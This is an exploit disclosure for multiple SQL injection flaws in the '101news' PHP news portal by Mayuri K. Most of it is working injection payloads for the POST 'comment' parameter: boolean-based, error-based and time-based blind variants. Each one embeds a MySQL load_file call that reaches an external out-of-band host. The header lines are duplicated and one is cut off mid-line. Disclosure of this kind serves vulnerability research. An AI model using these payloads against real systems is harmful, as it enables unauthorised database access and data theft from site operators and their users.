## Author: nu11secur1ty
## Date: 02.02.2023
## Vendor: https://mayurik.com/
## Software: https://mayurik.com/source-code/P4030/news- ## Title: 101news-by-Mayuri-K-1.0 Multiple-SQLi
## Author: nu11secur1ty
## Date: 02.02.2023
## Vendor: https://mayurik.com/
## Software: https://mayurik.com/source-code/P4030/news-portal-project-in-php
## Reference: https://portswigger.net/web-security/sql-injection
## Description:
The `comment` parameter appears to be vulnerable to SQL injection attacks.
The payload '+(select
load_file('\\1km7b3i42qkp4m2iy5ryphiobfh85zynpqdi0bo0.oastify.com\bxf'))+'
was submitted in the comment parameter.
This payload injects a SQL sub-query that calls MySQL's load_file
function with a UNC file path that references a URL on an external
domain.
The application interacted with that domain, indicating that the
injected SQL query was executed. This system is absolutely
UNPROTECTED!
STATUS: HIGH Vulnerability
[+]Payload:
```mysql
---
Parameter: comment (POST)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY
or GROUP BY clause
Payload: csrftoken=6606c0284475034686192a71b81d3e9360096c1bc0fa486d4a8636d582e2b0c5&name=IRSaszTW&email=YxpqSxQd@burpcollaborator.net&comment=167565'+(select
load_file('\\1km7b3i42qkp4m2iy5ryphiobfh85zynpqdi0bo0.oastify.com\bxf'))+''
RLIKE (SELECT (CASE WHEN (1140=1140) THEN 0x313637353635+(select
load_file(0x5c5c5c5c316b6d376233693432716b70346d3269793572797068696f62666838357a796e7071646930626f302e6f6173746966792e636f6d5c5c627866))+''
ELSE 0x28 END)) AND 'RBgF'='RBgF&submit=
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or
GROUP BY clause (FLOOR)
Payload: csrftoken=6606c0284475034686192a71b81d3e9360096c1bc0fa486d4a8636d582e2b0c5&name=IRSaszTW&email=YxpqSxQd@burpcollaborator.net&comment=167565'+(select
load_file('\\1km7b3i42qkp4m2iy5ryphiobfh85zynpqdi0bo0.oastify.com\bxf'))+''
AND (SELECT 4135 FROM(SELECT COUNT(*),CONCAT(0x71766b6a71,(SELECT
(ELT(4135=4135,1))),0x7171627071,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'iMBs'='iMBs&submit=
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: csrftoken=6606c0284475034686192a71b81d3e9360096c1bc0fa486d4a8636d582e2b0c5&name=IRSaszTW&email=YxpqSxQd@burpcollaborator.net&comment=167565'+(select
load_file('\\1km7b3i42qkp4m2iy5ryphiobfh85zynpqdi0bo0.oastify.com\bxf'))+''
AND (SELECT 1879 FROM (SELECT(SLEEP(3)))AQLB) AND 'asLq'='asLq&submit=
---
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2023/101news)
## Proof and Exploit:
[href](https://streamable.com/vrc7x8)
## Time spend:
01:00:00